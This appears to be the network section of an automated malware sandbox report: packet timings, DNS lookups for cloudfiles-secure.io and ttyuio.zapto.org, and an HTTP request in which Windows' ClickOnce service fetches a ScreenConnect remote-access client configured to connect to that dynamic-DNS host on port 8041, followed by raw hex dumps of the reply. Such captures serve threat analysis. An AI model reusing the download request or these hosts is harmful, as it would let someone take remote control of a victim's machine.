                                                                                                                                                                                                                Oct 2, 2024 06:16:40.355889082 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.356081009 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.356096983 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.356158018 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.356508017 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.356524944 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.356581926 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.356590986 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.357779980 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.357800961 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.357825994 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.357837915 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.357860088 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.357882023 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.439590931 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.439616919 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.439877987 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.439907074 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.439950943 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.444303036 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.444317102 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.444451094 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.444469929 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.445094109 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.445115089 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.445158005 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.445172071 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.445192099 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.445224047 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.445662975 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.445677996 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.445725918 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.445733070 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.446197033 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.446455956 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.446470022 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.446526051 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.446531057 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.448153019 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.523828983 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.523853064 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.523998022 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.524023056 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.524166107 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.526096106 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.526110888 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.526196957 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.526220083 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.526684046 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.526704073 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.526752949 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.526760101 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.526781082 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.526817083 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.528693914 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.528711081 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.528780937 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.528789043 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.532166004 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.533283949 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.533299923 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.533354998 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.533375025 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.533771992 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.533790112 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.533827066 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.533843040 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.533860922 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.533888102 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.534400940 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.534414053 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.534451962 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.534465075 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.534478903 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.534979105 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.535003901 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.535029888 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.535039902 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.535057068 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.535084009 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.536367893 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.612756968 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.612787962 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.612936020 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.612962008 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.615039110 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.615056992 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.615139961 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.615164995 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.615595102 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.615608931 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.615670919 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.615685940 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.616158962 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.617671967 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.617686987 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.617754936 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.617774963 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.617836952 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.622164965 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.622183084 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.622250080 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.622267008 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.622517109 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.622756004 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.622775078 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.622826099 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.622836113 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.622914076 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.623209953 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.623225927 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.623274088 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.623280048 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.623393059 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.623723030 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.623739958 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.623794079 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.623801947 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.623910904 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.701729059 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.701754093 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.701869965 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.701884031 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.703881979 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.703906059 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.703979015 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.703985929 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.704010963 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.704045057 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.704526901 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.704543114 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.704638958 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.704646111 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.705154896 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.706633091 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.706648111 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.706718922 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.706723928 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.706824064 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.711307049 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.711323977 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.711404085 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.711410999 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.711447001 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.711889029 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.711904049 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.711950064 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.711956024 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.711977005 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.711994886 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.712140083 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.712204933 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.712208986 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.712224007 CEST44349762178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.712272882 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:40.712702990 CEST49762443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:44.193844080 CEST497668041192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:44.198748112 CEST804149766178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:44.198873997 CEST497668041192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:45.252005100 CEST497668041192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:45.257500887 CEST804149766178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:45.435048103 CEST804149766178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:45.460445881 CEST497668041192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:45.465372086 CEST804149766178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:45.666466951 CEST804149766178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:45.710076094 CEST497668041192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:45.793966055 CEST804149766178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:45.835119009 CEST497668041192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:46.514085054 CEST497668041192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:46.514085054 CEST497668041192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:46.519052029 CEST804149766178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:46.519076109 CEST804149766178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:46.519084930 CEST804149766178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:46.519217968 CEST804149766178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:46.519227028 CEST804149766178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:17:20.990088940 CEST804149766178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:17:20.991436005 CEST497668041192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:17:20.996200085 CEST804149766178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:18:05.346595049 CEST804149766178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:18:05.350909948 CEST497668041192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:18:05.360512018 CEST804149766178.215.236.119192.168.2.4
                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                Oct 2, 2024 06:16:19.309437037 CEST5273453192.168.2.41.1.1.1
                                                                                                                                                                                                                Oct 2, 2024 06:16:19.469393015 CEST53527341.1.1.1192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:44.149514914 CEST5690253192.168.2.41.1.1.1
                                                                                                                                                                                                                Oct 2, 2024 06:16:44.158018112 CEST53569021.1.1.1192.168.2.4
                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                Oct 2, 2024 06:16:19.309437037 CEST192.168.2.41.1.1.10x1b18Standard query (0)cloudfiles-secure.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Oct 2, 2024 06:16:44.149514914 CEST192.168.2.41.1.1.10xd4c6Standard query (0)ttyuio.zapto.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                Oct 2, 2024 06:16:19.469393015 CEST1.1.1.1192.168.2.40x1b18No error (0)cloudfiles-secure.io178.215.236.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Oct 2, 2024 06:16:23.737463951 CEST1.1.1.1192.168.2.40x78c5No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                Oct 2, 2024 06:16:23.737463951 CEST1.1.1.1192.168.2.40x78c5No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Oct 2, 2024 06:16:24.316685915 CEST1.1.1.1192.168.2.40x80f8No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                Oct 2, 2024 06:16:24.316685915 CEST1.1.1.1192.168.2.40x80f8No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Oct 2, 2024 06:16:44.158018112 CEST1.1.1.1192.168.2.40xd4c6No error (0)ttyuio.zapto.org178.215.236.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                • cloudfiles-secure.io
                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                0192.168.2.449731178.215.236.1194436176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-10-02 04:16:20 UTC633OUTGET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1
                                                                                                                                                                                                                Host: cloudfiles-secure.io
                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                2024-10-02 04:16:20 UTC251INHTTP/1.1 200 OK
                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                Content-Length: 242016
                                                                                                                                                                                                                Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                Date: Wed, 02 Oct 2024 04:16:20 GMT
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-10-02 04:16:20 UTC16133INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d
                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
                                                                                                                                                                                                                2024-10-02 04:16:21 UTC16384INData Raw: 47 6c 69 52 47 38 79 66 59 52 6f 64 77 71 45 6c 46 44 4c 68 4b 54 47 45 6b 53 6b 48 75 45 45 6c 4f 31 6d 42 49 59 67 77 51 54 4d 39 72 37 45 35 69 6e 4a 52 53 58 55 49 59 55 79 31 33 46 46 43 58 6b 4e 52 56 67 42 49 49 56 64 59 61 51 46 57 34 36 48 68 59 43 77 4a 63 57 48 61 72 43 46 67 30 41 33 42 5a 69 6a 54 45 5a 37 35 39 53 47 39 4a 2f 42 78 37 6a 76 49 67 65 76 55 2b 52 48 6d 39 47 32 52 37 6f 79 66 6f 65 77 58 79 75 48 77 39 4f 45 53 42 36 7a 43 6f 67 4a 72 39 62 49 45 39 4b 4f 79 46 4a 6c 31 59 68 45 58 59 63 49 74 50 52 58 43 4c 58 66 4a 4d 69 37 52 32 79 49 75 4c 43 75 53 4b 59 33 42 51 6a 4e 43 7a 2b 49 2f 2b 4a 57 79 52 67 6f 57 67 6b 77 6a 5a 75 4a 47 48 4c 62 69 51 6a 30 32 38 6b 68 48 35 7a 4a 4c 4a 32 74 43 54 42 31 6d 59 6c 66 59 4e 57 4a
                                                                                                                                                                                                                Data Ascii: GliRG8yfYRodwqElFDLhKTGEkSkHuEElO1mBIYgwQTM9r7E5inJRSXUIYUy13FFCXkNRVgBIIVdYaQFW46HhYCwJcWHarCFg0A3BZijTEZ759SG9J/Bx7jvIgevU+RHm9G2R7oyfoewXyuHw9OESB6zCogJr9bIE9KOyFJl1YhEXYcItPRXCLXfJMi7R2yIuLCuSKY3BQjNCz+I/+JWyRgoWgkwjZuJGHLbiQj028khH5zJLJ2tCTB1mYlfYNWJ
                                                                                                                                                                                                                2024-10-02 04:16:21 UTC16384INData Raw: 55 41 62 41 42 4e 41 47 45 41 62 67 42 68 41 47 63 41 5a 51 42 44 41 48 49 41 5a 51 42 6b 41 47 55 41 62 67 42 30 41 47 6b 41 59 51 42 73 41 48 4d 41 52 41 42 6c 41 48 4d 41 59 77 42 79 41 47 6b 41 63 41 42 30 41 47 6b 41 62 77 42 75 41 43 49 4e 41 41 42 45 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 54 51 42 68 41 47 34 41 59 51 42 6e 41 47 55 41 51 77 42 79 41 47 55 41 5a 41 42 6c 41 47 34 41 64 41 42 70 41 47 45 41 62 41 42 7a 41 46 51 41 61 51 42 30 41 47 77 41 5a 51 42 5a 44 51 41 41 54 45 4d 41 62 77 42 75 41 48 51 41 63 67 42 76 41 47 77 41 55 41 42 68 41 47 34 41 5a 51 42 73 41 45 30 41 59 51 42 75 41 47 45 41 5a 77 42 6c 41 46 41 41 5a 51 42 79 41 48 4d 41 62 77 42 75 41 47 45 41 62 41 42 55 41
                                                                                                                                                                                                                Data Ascii: UAbABNAGEAbgBhAGcAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMARABlAHMAYwByAGkAcAB0AGkAbwBuACINAABEQwBvAG4AdAByAG8AbABQAGEAbgBlAGwATQBhAG4AYQBnAGUAQwByAGUAZABlAG4AdABpAGEAbABzAFQAaQB0AGwAZQBZDQAATEMAbwBuAHQAcgBvAGwAUABhAG4AZQBsAE0AYQBuAGEAZwBlAFAAZQByAHMAbwBuAGEAbABUA
